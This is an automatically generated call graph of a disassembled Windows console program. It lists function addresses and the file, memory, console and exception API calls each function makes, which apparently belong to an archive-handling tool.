74478->74479 75697 a8d24e 74479->75697 74490->73544 74491->73545 74492->73550 74493->73554 74494->73559 74495->73560 74496->73602 74497->73602 74498->73602 74499->73602 74500->73552 74501->73577 74503->73583 74505->73601 74507->73610 74509->73565 74512->73556 74513->73560 74515 a74415 __EH_prolog 74514->74515 74525->74319 75698 a8d259 75697->75698 75730->73675 75731->73671 75732 a67b20 75735 a67ab2 75732->75735 75736 a67ac5 75735->75736 75743 a6759a 75736->75743 75739 a67b03 75757 a67919 75739->75757 75740 a67aeb SetFileTime 75740->75739 75744 a675a4 __EH_prolog 75743->75744 75745 a6764c CloseHandle 75744->75745 75747 a675af 75745->75747 75746 a67632 75746->75739 75746->75740 75747->75746 75748 a675d4 CreateFileW 75747->75748 75749 a675e9 75747->75749 75748->75749 75749->75746 75750 a62e04 2 API calls 75749->75750 75751 a675fb 75750->75751 75752 a68b4a 9 API calls 75751->75752 75753 a67611 75752->75753 75754 a67615 CreateFileW 75753->75754 75755 a6762a 75753->75755 75754->75755 75773 a61e40 free 75755->75773 75758 a67aac 75757->75758 75759 a6793c 75757->75759 75759->75758 75760 a67945 DeviceIoControl 75759->75760 75761 a679e6 75760->75761 75762 a67969 75760->75762 75763 a679ef DeviceIoControl 75761->75763 75766 a67a14 75761->75766 75762->75761 75768 a679a7 75762->75768 75764 a67a22 DeviceIoControl 75763->75764 75763->75766 75765 a67a44 DeviceIoControl 75764->75765 75764->75766 75765->75766 75766->75758 75775 a6780d 8 API calls ctype 75766->75775 75774 a69252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 75768->75774 75769 a67aa5 75771 a677de 5 API calls 75769->75771 75771->75758 75772 a679d0 75772->75761 75773->75746 75774->75772 75775->75769 75776 ae6ba3 VirtualFree 75777 aabf67 75778 aabf85 75777->75778 75779 aabf74 75777->75779 75779->75778 75783 aabf8c 75779->75783 75784 aabf96 __EH_prolog 75783->75784 75800 aad144 75784->75800 75788 aabfd0 75807 a61e40 free 75788->75807 75790 aabfdb 75808 a61e40 free 75790->75808 75792 aabfe6 75809 aac072 free ctype 75792->75809 75794 aabff4 75810 a7aafa free VariantClear ctype 75794->75810 75796 aac023 75811 a873d2 free VariantClear __EH_prolog ctype 75796->75811 75798 aabf7f 75799 a61e40 free 75798->75799 75799->75778 75802 aad14e __EH_prolog 75800->75802 75812 aad1b7 75802->75812 75805 aabfc5 75806 a61e40 free 75805->75806 75806->75788 75807->75790 75808->75792 75809->75794 75810->75796 75811->75798 75820 aad23c 75812->75820 75814 aad1ed 75827 a61e40 free 75814->75827 75816 aad209 75828 a61e40 free 75816->75828 75818 aad180 75819 aa8e04 memset 75818->75819 75819->75805 75829 aad2b8 75820->75829 75823 aad25e 75846 a61e40 free 75823->75846 75826 aad275 75826->75814 75827->75816 75828->75818 75848 a61e40 free 75829->75848 75831 aad2c8 75849 a61e40 free 75831->75849 75833 aad2dc 75850 a61e40 free 75833->75850 75835 aad2e7 75851 a61e40 free 75835->75851 75837 aad2f2 75852 a61e40 free 75837->75852 75839 aad2fd 75853 a61e40 free 75839->75853 75841 aad308 75854 a61e40 free 75841->75854 75843 aad313 75844 aad246 75843->75844 75855 a61e40 free 75843->75855 75844->75823 75847 a61e40 free 75844->75847 75846->75826 75847->75823 75848->75831 75849->75833 75850->75835 75851->75837 75852->75839 75853->75841 75854->75843 75855->75844 75856 a9c2e6 75857 a9c52f 75856->75857 75860 a9544f SetConsoleCtrlHandler 75857->75860 75859 a9c53b 75860->75859 75861 af7da0 WaitForSingleObject 75862 af7dbb GetLastError 75861->75862 75863 af7dc1 75861->75863 75862->75863 75864 af7dce CloseHandle 75863->75864 75865 af7ddf 75863->75865 75864->75865 75866 af7dd9 GetLastError 75864->75866 75866->75865 75867 a71368 75869 a7136d 75867->75869 75870 a7138c 75869->75870 75873 af7d80 WaitForSingleObject 75869->75873 75876 a9f745 75869->75876 75880 af7ea0 SetEvent GetLastError 75869->75880 75874 af7d8e GetLastError 75873->75874 75875 af7d98 75873->75875 75874->75875 75875->75869 75877 a9f74f __EH_prolog 75876->75877 75881 a9f784 75877->75881 75879 a9f765 75879->75869 75880->75869 75882 a9f78e __EH_prolog 75881->75882 75883 a712d4 4 API calls 75882->75883 75884 a9f7c7 75883->75884 75885 a712d4 4 API calls 75884->75885 75886 a9f7d4 75885->75886 75887 a9f871 75886->75887 75890 ae6b23 VirtualAlloc 75886->75890 75891 a6c4d6 75886->75891 75887->75879 75890->75887 75895 a6c4e9 75891->75895 75892 a6c6f3 75892->75887 75895->75892 75896 a6c695 memmove 75895->75896 75897 a7111c 75895->75897 75902 a711b4 75895->75902 75896->75895 75898 a71130 75897->75898 75899 a7115f 75898->75899 75907 a6b668 75898->75907 75926 a6d331 75898->75926 75899->75895 75903 a711c1 75902->75903 75904 a711eb 75903->75904 75938 aaae7c 75903->75938 75943 aaaf27 75903->75943 75904->75895 75919 a6b675 75907->75919 75908 a6b864 75930 a67b7c 75908->75930 75911 a6b8aa GetLastError 75912 a6b6aa 75911->75912 75912->75898 75913 a6b81b 75913->75912 75916 a6b839 memcpy 75913->75916 75914 a67731 5 API calls 75914->75919 75915 a6b7e7 75915->75908 75918 a67731 5 API calls 75915->75918 75916->75912 75917 a6b811 75936 a6b8ec GetLastError 75917->75936 75921 a6b80d 75918->75921 75919->75908 75919->75912 75919->75913 75919->75914 75919->75915 75919->75917 75920 a6b7ad 75919->75920 75935 a67b4f ReadFile 75919->75935 75920->75919 75925 a6b8c7 75920->75925 75934 ae6a20 VirtualAlloc 75920->75934 75921->75908 75921->75917 75925->75912 75928 a6d355 75926->75928 75927 a6d374 75927->75898 75928->75927 75929 a6b668 10 API calls 75928->75929 75929->75927 75931 a67b89 75930->75931 75937 a67b4f ReadFile 75931->75937 75933 a67b9a 75933->75911 75933->75912 75934->75920 75935->75919 75936->75912 75937->75933 75939 aaae86 75938->75939 75942 a77140 7 API calls 75939->75942 75950 a77190 75939->75950 75940 aaaebb 75940->75903 75942->75940 75946 aaaf36 75943->75946 75944 aab010 75944->75903 75945 aaaeeb 107 API calls 75945->75946 75946->75944 75946->75945 75947 aaad3a 99 API calls 75946->75947 76021 a6bd0c 75946->76021 76026 aaaebf 107 API calls 75946->76026 75947->75946 75951 a7719a __EH_prolog 75950->75951 75952 a771b0 75951->75952 75955 a771dd 75951->75955 75953 a74d78 VariantClear 75952->75953 75960 a771b7 75953->75960 75963 a76fc5 75955->75963 75956 a772b4 75957 a74d78 VariantClear 75956->75957 75958 a772c0 75956->75958 75957->75958 75959 a77140 7 API calls 75958->75959 75958->75960 75959->75960 75960->75940 75961 a772a3 SetFileSecurityW 75961->75956 75962 a77236 75962->75956 75962->75960 75962->75961 75964 a76fcf __EH_prolog 75963->75964 75965 a744a6 2 API calls 75964->75965 75968 a76fec 75965->75968 75966 a7706a 75989 a768ac 75966->75989 75968->75966 75972 a77029 75968->75972 76007 a76e71 12 API calls 2 library calls 75968->76007 75970 a7709e 76013 a61e40 free 75970->76013 75972->75966 76008 a74dff 7 API calls 2 library calls 75972->76008 75973 a77051 75973->75966 75976 a711b4 107 API calls 75973->75976 75976->75966 75977 a7712e 75977->75962 75978 a770c0 76009 a66096 15 API calls 2 library calls 75978->76009 75980 a770d1 75981 a770e2 75980->75981 76010 a74dff 7 API calls 2 library calls 75980->76010 75986 a770e6 75981->75986 76011 a76b5e 69 API calls 2 library calls 75981->76011 75984 a770fd 75985 a77103 75984->75985 75984->75986 76012 a61e40 free 75985->76012 75986->75970 75988 a7710b 75988->75977 75990 a768b6 __EH_prolog 75989->75990 75992 a76921 75990->75992 75993 a67d4b 6 API calls 75990->75993 76004 a768c5 75990->76004 75991 a76962 75994 a76998 75991->75994 76017 a62dcd malloc _CxxThrowException 75991->76017 75992->75991 75992->75994 76016 a76a17 6 API calls 2 library calls 75992->76016 75998 a76906 75993->75998 75995 a769e1 75994->75995 76014 a67c3b SetFileTime 75994->76014 76020 a6bcf8 CloseHandle 75995->76020 75998->75992 76015 a74dff 7 API calls 2 library calls 75998->76015 76001 a7697a 76018 a76b09 13 API calls __EH_prolog 76001->76018 76004->75970 76004->75978 76005 a7698c 76019 a61e40 free 76005->76019 76007->75972 76008->75973 76009->75980 76010->75981 76011->75984 76012->75988 76013->75977 76014->75995 76015->75992 76016->75991 76017->76001 76018->76005 76019->75994 76020->76004 76027 a67ca2 76021->76027 76024 a6bd3d 76024->75946 76026->75946 76029 a67caf 76027->76029 76030 a67cdb 76029->76030 76032 a67c68 76029->76032 76030->76024 76031 a6b8ec GetLastError 76030->76031 76031->76024 76033 a67c76 76032->76033 76034 a67c79 WriteFile 76032->76034 76033->76034 76034->76029 76035 a8cefb 76036 a8d0cc 76035->76036 76037 a8cf03 76035->76037 76037->76036 76082 a8cae9 VariantClear 76037->76082 76039 a8cf59 76039->76036 76083 a8cae9 VariantClear 76039->76083 76041 a8cf71 76041->76036 76084 a8cae9 VariantClear 76041->76084 76043 a8cf87 76043->76036 76085 a8cae9 VariantClear 76043->76085 76045 a8cf9d 76045->76036 76086 a8cae9 VariantClear 76045->76086 76047 a8cfb3 76047->76036 76087 a8cae9 VariantClear 76047->76087 76049 a8cfc9 76049->76036 76088 a64504 malloc _CxxThrowException 76049->76088 76051 a8cfdc 76052 a62e04 2 API calls 76051->76052 76054 a8cfe7 76052->76054 76053 a8d009 76056 a8d07b 76053->76056 76058 a8d080 76053->76058 76059 a8d030 76053->76059 76054->76053 76055 a62f88 3 API calls 76054->76055 76055->76053 76096 a61e40 free 76056->76096 76093 a87a0c CharUpperW 76058->76093 76062 a62e04 2 API calls 76059->76062 76060 a8d0c4 76097 a61e40 free 76060->76097 76065 a8d038 76062->76065 76064 a8d08b 76094 a7fdbc 4 API calls 2 library calls 76064->76094 76066 a62e04 2 API calls 76065->76066 76068 a8d046 76066->76068 76089 a7fdbc 4 API calls 2 library calls 76068->76089 76069 a8d0a7 76071 a62fec 3 API calls 76069->76071 76073 a8d0b3 76071->76073 76072 a8d057 76074 a62fec 3 API calls 76072->76074 76095 a61e40 free 76073->76095 76076 a8d063 76074->76076 76090 a61e40 free 76076->76090 76078 a8d06b 76091 a61e40 free 76078->76091 76080 a8d073 76092 a61e40 free 76080->76092 76082->76039 76083->76041 76084->76043 76085->76045 76086->76047 76087->76049 76088->76051 76089->76072 76090->76078 76091->76080 76092->76056 76093->76064 76094->76069 76095->76056 76096->76060 76097->76036 76098 a9993d 76182 a9b5b1 76098->76182 76101 a99963 76188 a71f33 76101->76188 76103 a61fb3 11 API calls 76103->76101 76104 a99975 76105 a999ce 76104->76105 76106 a999b7 GetStdHandle GetConsoleScreenBufferInfo 76104->76106 76107 a61e0c ctype 2 API calls 76105->76107 76106->76105 76108 a999dc 76107->76108 76309 a87b48 76108->76309 76110 a99a29 76326 a9b96d _CxxThrowException 76110->76326 76112 a99a30 76327 a87018 8 API calls 2 library calls 76112->76327 76114 a99a7c 76328 a8ddb5 6 API calls 2 library calls 76114->76328 76116 a99a66 _CxxThrowException 76116->76114 76117 a99aa6 76118 a99aaa _CxxThrowException 76117->76118 76128 a99ac0 76117->76128 76118->76128 76119 a99a37 76119->76114 76119->76116 76120 a99b3a 76332 a61fa0 fputc 76120->76332 76123 a99bfa _CxxThrowException 76179 a99be6 76123->76179 76124 a99b63 fputs 76333 a61fa0 fputc 76124->76333 76127 a99b79 strlen strlen 76129 a99baa fputs fputc 76127->76129 76130 a99e25 76127->76130 76128->76120 76128->76123 76329 a87dd7 7 API calls 2 library calls 76128->76329 76330 a9c077 6 API calls 76128->76330 76331 a61e40 free 76128->76331 76129->76179 76341 a61fa0 fputc 76130->76341 76133 a99e2c fputs 76342 a61fa0 fputc 76133->76342 76135 a99f0c 76347 a61fa0 fputc 76135->76347 76139 a9b67d 12 API calls 76139->76179 76140 a99f13 fputs 76348 a61fa0 fputc 76140->76348 76143 a99f9f 76145 a9ac3a 76143->76145 76148 a9ac35 76143->76148 76144 a62e04 2 API calls 76144->76179 76354 a9b96d _CxxThrowException 76145->76354 76353 a9b988 33 API calls __aulldiv 76148->76353 76149 a9ac42 76355 a61e40 free 76149->76355 76153 a9ac4d 76156 a83247 free 76153->76156 76155 a631e5 malloc _CxxThrowException free _CxxThrowException 76155->76179 76158 a9ac5d 76156->76158 76157 a99f29 76157->76143 76169 a99f77 fputs 76157->76169 76349 a9b650 fputc fputs fputs fputc 76157->76349 76350 a9b5e9 fputc fputs 76157->76350 76351 a9bde4 fputc fputs 76157->76351 76356 a61e40 free 76158->76356 76160 a99d2a fputs 76338 a621d8 fputs 76160->76338 76164 a99d5f fputs 76164->76179 76167 a9ac7d 76357 a611c2 free __EH_prolog ctype 76167->76357 76168 a99e42 76168->76135 76175 a99ee0 fputs 76168->76175 76343 a9b650 fputc fputs fputs fputc 76168->76343 76344 a621d8 fputs 76168->76344 76345 a9bde4 fputc fputs 76168->76345 76352 a61fa0 fputc 76169->76352 76174 a9ac89 76358 a9be0c free __EH_prolog ctype 76174->76358 76346 a61fa0 fputc 76175->76346 76178 a9ac98 76359 a92db9 free ctype 76178->76359 76179->76129 76179->76130 76179->76139 76179->76144 76179->76155 76179->76160 76179->76164 76334 a621d8 fputs 76179->76334 76335 a6315e malloc _CxxThrowException free _CxxThrowException 76179->76335 76336 a63221 malloc _CxxThrowException free _CxxThrowException 76179->76336 76337 a61089 malloc _CxxThrowException free _CxxThrowException 76179->76337 76339 a61fa0 fputc 76179->76339 76340 a61e40 free 76179->76340 76181 a9aca4 76183 a9b5bc fputs 76182->76183 76184 a9994a 76182->76184 76360 a61fa0 fputc 76183->76360 76184->76101 76184->76103 76186 a9b5d5 76186->76184 76187 a9b5d9 fputs 76186->76187 76187->76184 76189 a71f4f 76188->76189 76190 a71f6c 76188->76190 76393 a81d73 5 API calls __EH_prolog 76189->76393 76361 a729eb 76190->76361 76193 a71f5e _CxxThrowException 76193->76190 76195 a71fa3 76197 a71fbc 76195->76197 76199 a64fc0 5 API calls 76195->76199 76200 a71fda 76197->76200 76201 a62fec 3 API calls 76197->76201 76198 a71f95 _CxxThrowException 76198->76195 76199->76197 76202 a72022 wcscmp 76200->76202 76210 a72036 76200->76210 76201->76200 76203 a720af 76202->76203 76202->76210 76395 a81d73 5 API calls __EH_prolog 76203->76395 76205 a720be _CxxThrowException 76205->76210 76206 a720a9 76396 a7393c 6 API calls 2 library calls 76206->76396 76208 a720f4 76397 a7393c 6 API calls 2 library calls 76208->76397 76210->76206 76214 a7219a 76210->76214 76211 a72108 76212 a72135 76211->76212 76398 a72e04 62 API calls 2 library calls 76211->76398 76220 a72159 76212->76220 76399 a72e04 62 API calls 2 library calls 76212->76399 76400 a81d73 5 API calls __EH_prolog 76214->76400 76217 a721a9 _CxxThrowException 76217->76220 76218 a7227f 76366 a72aa9 76218->76366 76219 a72245 76223 a62fec 3 API calls 76219->76223 76220->76218 76220->76219 76401 a81d73 5 API calls __EH_prolog 76220->76401 76226 a7225c 76223->76226 76225 a72237 _CxxThrowException 76225->76219 76226->76218 76402 a81d73 5 API calls __EH_prolog 76226->76402 76227 a722d9 76229 a72302 76227->76229 76230 a62fec 3 API calls 76227->76230 76228 a62fec 3 API calls 76228->76227 76231 a64fc0 5 API calls 76229->76231 76230->76229 76233 a72315 76231->76233 76384 a7384c 76233->76384 76234 a72271 _CxxThrowException 76234->76218 76236 a72322 76238 a726c6 76236->76238 76243 a723a1 76236->76243 76237 a728ce 76239 a7293a 76237->76239 76252 a728d5 76237->76252 76238->76237 76240 a72700 76238->76240 76415 a81d73 5 API calls __EH_prolog 76238->76415 76244 a729a5 76239->76244 76245 a7293f 76239->76245 76416 a732ec 14 API calls 2 library calls 76240->76416 76250 a7247a wcscmp 76243->76250 76270 a7248e 76243->76270 76247 a729ae _CxxThrowException 76244->76247 76301 a7264d 76244->76301 76423 a64eec 16 API calls 76245->76423 76246 a726f2 _CxxThrowException 76246->76240 76248 a72713 76253 a73a29 5 API calls 76248->76253 76255 a724cf wcscmp 76250->76255 76250->76270 76252->76301 76422 a81d73 5 API calls __EH_prolog 76252->76422 76265 a72722 76253->76265 76254 a7294c 76424 a64ea1 8 API calls 76254->76424 76260 a724ef wcscmp 76255->76260 76255->76270 76257 a72953 76261 a64fc0 5 API calls 76257->76261 76263 a7250f 76260->76263 76260->76270 76261->76301 76262 a72920 _CxxThrowException 76262->76301 76406 a81d73 5 API calls __EH_prolog 76263->76406 76267 a727cf 76265->76267 76269 a62fec 3 API calls 76265->76269 76266 a7251e _CxxThrowException 76268 a7252c 76266->76268 76271 a72880 76267->76271 76276 a7281f 76267->76276 76418 a81d73 5 API calls __EH_prolog 76267->76418 76272 a72569 76268->76272 76407 a72e04 62 API calls 2 library calls 76268->76407 76273 a727a9 76269->76273 76270->76268 76403 a64eec 16 API calls 76270->76403 76404 a64ea1 8 API calls 76270->76404 76405 a81d73 5 API calls __EH_prolog 76270->76405 76274 a7289b 76271->76274 76281 a62fec 3 API calls 76271->76281 76278 a7258c 76272->76278 76408 a72e04 62 API calls 2 library calls 76272->76408 76273->76267 76417 a63563 memmove 76273->76417 76274->76301 76421 a81d73 5 API calls __EH_prolog 76274->76421 76276->76271 76282 a72847 76276->76282 76419 a81d73 5 API calls __EH_prolog 76276->76419 76284 a725a4 76278->76284 76409 a72a61 malloc _CxxThrowException free _CxxThrowException memcpy 76278->76409 76279 a724c1 _CxxThrowException 76279->76255 76281->76274 76282->76271 76420 a81d73 5 API calls __EH_prolog 76282->76420 76410 a64eec 16 API calls 76284->76410 76285 a72811 _CxxThrowException 76285->76276 76291 a728c0 _CxxThrowException 76291->76237 76292 a72839 _CxxThrowException 76292->76282 76294 a725ad 76411 a81b07 49 API calls 76294->76411 76295 a72872 _CxxThrowException 76295->76271 76297 a725b4 76412 a64ea1 8 API calls 76297->76412 76299 a725bb 76300 a62fec 3 API calls 76299->76300 76303 a725d6 76299->76303 76300->76303 76301->76104 76302 a7261f 76302->76301 76304 a62fec 3 API calls 76302->76304 76303->76301 76303->76302 76413 a81d73 5 API calls __EH_prolog 76303->76413 76306 a7263f 76304->76306 76414 a6859e malloc _CxxThrowException free _CxxThrowException 76306->76414 76307 a72611 _CxxThrowException 76307->76302 76310 a87b52 __EH_prolog 76309->76310 76434 a87eec 76310->76434 76312 a87ca4 76312->76110 76314 a62e04 malloc _CxxThrowException 76321 a87b63 76314->76321 76316 a630ea malloc _CxxThrowException free 76316->76321 76317 a61e40 free ctype 76317->76321 76319 aa04d2 5 API calls 76319->76321 76321->76312 76321->76314 76321->76316 76321->76317 76321->76319 76323 a6429a 3 API calls 76321->76323 76324 a87c61 memcpy 76321->76324 76439 a870ea 76321->76439 76442 a87a40 76321->76442 76460 a87cc3 6 API calls 76321->76460 76461 a712a5 76321->76461 76466 a874eb malloc _CxxThrowException memcpy __EH_prolog ctype 76321->76466 76467 a87193 76321->76467 76323->76321 76324->76321 76326->76112 76327->76119 76328->76117 76329->76128 76330->76128 76331->76128 76332->76124 76333->76127 76334->76179 76335->76179 76336->76179 76337->76179 76338->76179 76339->76179 76340->76179 76341->76133 76342->76168 76343->76168 76344->76168 76345->76168 76346->76168 76347->76140 76348->76157 76349->76157 76350->76157 76351->76157 76352->76157 76353->76145 76354->76149 76355->76153 76356->76167 76357->76174 76358->76178 76359->76181 76360->76186 76362 a62f1c 2 API calls 76361->76362 76363 a729fe 76362->76363 76425 a61e40 free 76363->76425 76365 a71f7e 76365->76195 76394 a81d73 5 API calls __EH_prolog 76365->76394 76367 a72ab3 __EH_prolog 76366->76367 76368 a62e8a 2 API calls 76367->76368 76376 a72b0f 76367->76376 76370 a72af4 76368->76370 76369 a722ad 76369->76227 76369->76228 76426 a72a61 malloc _CxxThrowException free _CxxThrowException memcpy 76370->76426 76372 a72bc6 76432 a81d73 5 API calls __EH_prolog 76372->76432 76373 a72b04 76427 a61e40 free 76373->76427 76376->76369 76376->76372 76381 a72b9f 76376->76381 76428 a72cb4 48 API calls 2 library calls 76376->76428 76429 a72bf5 8 API calls __EH_prolog 76376->76429 76430 a72a61 malloc _CxxThrowException free _CxxThrowException memcpy 76376->76430 76377 a72bd6 _CxxThrowException 76377->76369 76381->76369 76431 a81d73 5 API calls __EH_prolog 76381->76431 76383 a72bb8 _CxxThrowException 76383->76372 76391 a73856 __EH_prolog 76384->76391 76385 a73917 76385->76236 76386 a62e04 malloc _CxxThrowException 76386->76391 76387 a62fec 3 API calls 76387->76391 76388 a62f88 3 API calls 76388->76391 76389 aa04d2 5 API calls 76389->76391 76391->76385 76391->76386 76391->76387 76391->76388 76391->76389 76392 a61e40 free ctype 76391->76392 76433 a73b76 malloc _CxxThrowException __EH_prolog ctype 76391->76433 76392->76391 76393->76193 76394->76198 76395->76205 76396->76208 76397->76211 76398->76212 76399->76220 76400->76217 76401->76225 76402->76234 76403->76270 76404->76270 76405->76279 76406->76266 76407->76272 76408->76278 76409->76284 76410->76294 76411->76297 76412->76299 76413->76307 76414->76301 76415->76246 76416->76248 76417->76267 76418->76285 76419->76292 76420->76295 76421->76291 76422->76262 76423->76254 76424->76257 76425->76365 76426->76373 76427->76376 76428->76376 76429->76376 76430->76376 76431->76383 76432->76377 76433->76391 76435 a87ef7 76434->76435 76437 a87f14 76434->76437 76436 a87193 free 76435->76436 76435->76437 76475 a61e40 free 76435->76475 76436->76435 76437->76321 76440 a62e04 2 API calls 76439->76440 76441 a87103 76440->76441 76441->76321 76443 a87a4a __EH_prolog 76442->76443 76476 a6361b 6 API calls 2 library calls 76443->76476 76445 a87a78 76477 a6361b 6 API calls 2 library calls 76445->76477 76447 a87b20 76479 a92db9 free ctype 76447->76479 76449 a87b2b 76480 a92db9 free ctype 76449->76480 76450 a62e04 malloc _CxxThrowException 76459 a87a83 76450->76459 76452 a87b37 76452->76321 76453 a62fec 3 API calls 76453->76459 76454 a62fec 3 API calls 76456 a87aca wcscmp 76454->76456 76455 aa04d2 5 API calls 76455->76459 76456->76459 76458 a61e40 free ctype 76458->76459 76459->76447 76459->76450 76459->76453 76459->76454 76459->76455 76459->76458 76478 a87955 malloc _CxxThrowException __EH_prolog ctype 76459->76478 76460->76321 76462 aa04d2 5 API calls 76461->76462 76463 a712ad 76462->76463 76464 a61e0c ctype 2 API calls 76463->76464 76465 a712b4 76464->76465 76465->76321 76466->76321 76468 a8719d __EH_prolog 76467->76468 76481 a92db9 free ctype 76468->76481 76470 a871b3 76482 a871d5 free __EH_prolog ctype 76470->76482 76472 a871bf 76483 a61e40 free 76472->76483 76474 a871c7 76474->76321 76475->76435 76476->76445 76477->76459 76478->76459 76479->76449 76480->76452 76481->76470 76482->76472 76483->76474 76484 aa8eb1 76489 aa8ed1 76484->76489 76487 aa8ec9 76490 aa8edb __EH_prolog 76489->76490 76498 aa9267 76490->76498 76494 aa8efd 76503 a9e5f1 free ctype 76494->76503 76496 aa8eb9 76496->76487 76497 a61e40 free 76496->76497 76497->76487 76499 aa9271 __EH_prolog 76498->76499 76504 a61e40 free 76499->76504 76501 aa8ef1 76502 aa922b free CloseHandle GetLastError ctype 76501->76502 76502->76494 76503->76496 76504->76501 76505 a6c3bd 76506 a6c3ca 76505->76506 76508 a6c3db 76505->76508 76506->76508 76509 a61e40 free 76506->76509 76509->76508 76510 a95475 76511 a62fec 3 API calls 76510->76511 76512 a954b4 76511->76512 76513 a9c911 24 API calls 76512->76513 76514 a954bb 76513->76514 76518 a9adb7 76519 a9adc1 __EH_prolog 76518->76519 76520 a626dd 2 API calls 76519->76520 76521 a9ae1d 76520->76521 76522 a62e04 2 API calls 76521->76522 76523 a9ae38 76522->76523 76524 a62e04 2 API calls 76523->76524 76525 a9ae44 76524->76525 76526 a62e04 2 API calls 76525->76526 76527 a9ae68 76526->76527 76528 a9ad29 2 API calls 76527->76528 76529 a9ae85 76528->76529 76534 a9af2d 76529->76534 76531 a9ae94 76532 a62e04 2 API calls 76531->76532 76533 a9aeb2 76532->76533 76535 a9af37 __EH_prolog 76534->76535 76546 a734f4 malloc _CxxThrowException __EH_prolog 76535->76546 76537 a9afac 76538 a62e04 2 API calls 76537->76538 76539 a9afbb 76538->76539 76540 a62e04 2 API calls 76539->76540 76541 a9afca 76540->76541 76542 a62e04 2 API calls 76541->76542 76543 a9afd9 76542->76543 76544 a62e04 2 API calls 76543->76544 76545 a9afe8 76544->76545 76545->76531 76546->76537 76547 afffb1 __setusermatherr 76548 afffbd 76547->76548 76553 b00068 _controlfp 76548->76553 76550 afffc2 _initterm __getmainargs _initterm __p___initenv 76551 a9c27c 76550->76551 76552 b0001d exit _XcptFilter 76551->76552 76553->76550 76554 ae69f0 free 76555 a8d948 76585 a8dac7 76555->76585 76557 a8d94f 76558 a62e04 2 API calls 76557->76558 76559 a8d97b 76558->76559 76560 a62e04 2 API calls 76559->76560 76561 a8d987 76560->76561 76564 a8d9e7 76561->76564 76593 a66404 76561->76593 76566 a8da0f 76564->76566 76567 a8da36 76564->76567 76618 a61e40 free 76566->76618 76570 a8da94 76567->76570 76578 a62da9 2 API calls 76567->76578 76582 aa04d2 5 API calls 76567->76582 76620 a61524 malloc _CxxThrowException __EH_prolog ctype 76567->76620 76621 a61e40 free 76567->76621 76569 a8d9bf 76616 a61e40 free 76569->76616 76622 a61e40 free 76570->76622 76574 a8da17 76619 a61e40 free 76574->76619 76576 a8d9c7 76617 a61e40 free 76576->76617 76577 a8da9c 76623 a61e40 free 76577->76623 76578->76567 76579 a8d9cf 76582->76567 76586 a8dad1 __EH_prolog 76585->76586 76587 a62e04 2 API calls 76586->76587 76588 a8db33 76587->76588 76589 a62e04 2 API calls 76588->76589 76590 a8db3f 76589->76590 76591 a62e04 2 API calls 76590->76591 76592 a8db55 76591->76592 76592->76557 76594 a6631f 9 API calls 76593->76594 76595 a66414 76594->76595 76596 a66423 76595->76596 76597 a62f88 3 API calls 76595->76597 76598 a62f88 3 API calls 76596->76598 76597->76596 76599 a6643d 76598->76599 76600 a77e5a 76599->76600 76601 a77e64 __EH_prolog 76600->76601 76624 a78179 76601->76624 76604 a87ebb free 76605 a77e7f 76604->76605 76606 a62fec 3 API calls 76605->76606 76607 a77e9a 76606->76607 76608 a62da9 2 API calls 76607->76608 76609 a77ea7 76608->76609 76610 a66c72 44 API calls 76609->76610 76611 a77eb7 76610->76611 76629 a61e40 free 76611->76629 76613 a77ecb 76614 a77ed8 76613->76614 76630 a6757d GetLastError 76613->76630 76614->76564 76614->76569 76616->76576 76617->76579 76618->76574 76619->76579 76620->76567 76621->76567 76622->76577 76623->76579 76628 a78906 76624->76628 76625 a77e77 76625->76604 76628->76625 76631 a78804 free ctype 76628->76631 76632 a61e40 free 76628->76632 76629->76613 76630->76614 76631->76628 76632->76628 76633 a6b144 76634 a6b153 76633->76634 76636 a6b159 76633->76636 76635 a711b4 107 API calls 76634->76635 76635->76636 76637 ae6bc6 76638 ae6bcd 76637->76638 76639 ae6bca 76637->76639 76638->76639 76640 ae6bd1 malloc 76638->76640 76640->76639 76641 aa0343 76646 aa035f 76641->76646 76644 aa0358 76647 aa0369 __EH_prolog 76646->76647 76663 a7139e 76647->76663 76652 aa0143 ctype free 76653 aa039a 76652->76653 76673 a61e40 free 76653->76673 76655 aa03a2 76674 a61e40 free 76655->76674 76657 aa03aa 76675 aa03d8 76657->76675 76662 a61e40 free 76662->76644 76664 a713b3 76663->76664 76665 a713ae 76663->76665 76667 aa01c4 76664->76667 76691 af7ea0 SetEvent GetLastError 76665->76691 76670 aa01ce __EH_prolog 76667->76670 76668 aa0203 76692 a61e40 free 76668->76692 76670->76668 76693 a61e40 free 76670->76693 76671 aa020b 76671->76652 76673->76655 76674->76657 76676 aa03e2 __EH_prolog 76675->76676 76677 a7139e ctype 2 API calls 76676->76677 76678 aa03fb 76677->76678 76694 af7d50 76678->76694 76680 aa0403 76681 af7d50 ctype 2 API calls 76680->76681 76682 aa040b 76681->76682 76683 af7d50 ctype 2 API calls 76682->76683 76684 aa03b7 76683->76684 76685 aa004a 76684->76685 76686 aa0054 __EH_prolog 76685->76686 76700 a61e40 free 76686->76700 76688 aa0067 76701 a61e40 free 76688->76701 76690 aa006f 76690->76644 76690->76662 76691->76664 76692->76671 76693->76670 76695 af7d7b 76694->76695 76696 af7d59 CloseHandle 76694->76696 76695->76680 76697 af7d75 76696->76697 76698 af7d64 GetLastError 76696->76698 76697->76695 76698->76695 76699 af7d6e 76698->76699 76699->76680 76700->76688 76701->76690 76702 a8d3c2 76703 a8d3e9 76702->76703 76704 a6965d VariantClear 76703->76704 76705 a8d42a 76704->76705 76706 a8d883 2 API calls 76705->76706 76707 a8d4b1 76706->76707 76793 a88d4a 76707->76793 76710 a88b05 VariantClear 76712 a8d4e3 76710->76712 76711 a82a72 2 API calls 76713 a8d54c 76711->76713 76712->76711 76714 a62fec 3 API calls 76713->76714 76715 a8d594 76714->76715 76716 a8d5cd 76715->76716 76717 a8d742 76715->76717 76718 a8d7d9 76716->76718 76810 a89317 76716->76810 76825 a8cd49 malloc _CxxThrowException free 76717->76825 76828 a61e40 free 76718->76828 76721 a8d754 76724 a62fec 3 API calls 76721->76724 76727 a8d763 76724->76727 76725 a8d7e1 76829 a61e40 free 76725->76829 76726 a8d5f1 76730 aa04d2 5 API calls 76726->76730 76826 a61e40 free 76727->76826 76729 a8d7e9 76732 a8326b free 76729->76732 76733 a8d5f9 76730->76733 76744 a8d69a 76732->76744 76816 a8e332 76733->76816 76734 a8d76b 76827 a61e40 free 76734->76827 76737 a8d773 76739 a8326b free 76737->76739 76739->76744 76741 a8d610 76823 a61e40 free 76741->76823 76743 a8d618 76745 a8326b free 76743->76745 76746 a8d2a8 76745->76746 76746->76744 76768 a8d883 76746->76768 76749 a62fec 3 API calls 76750 a8d361 76749->76750 76751 a62fec 3 API calls 76750->76751 76752 a8d36d 76751->76752 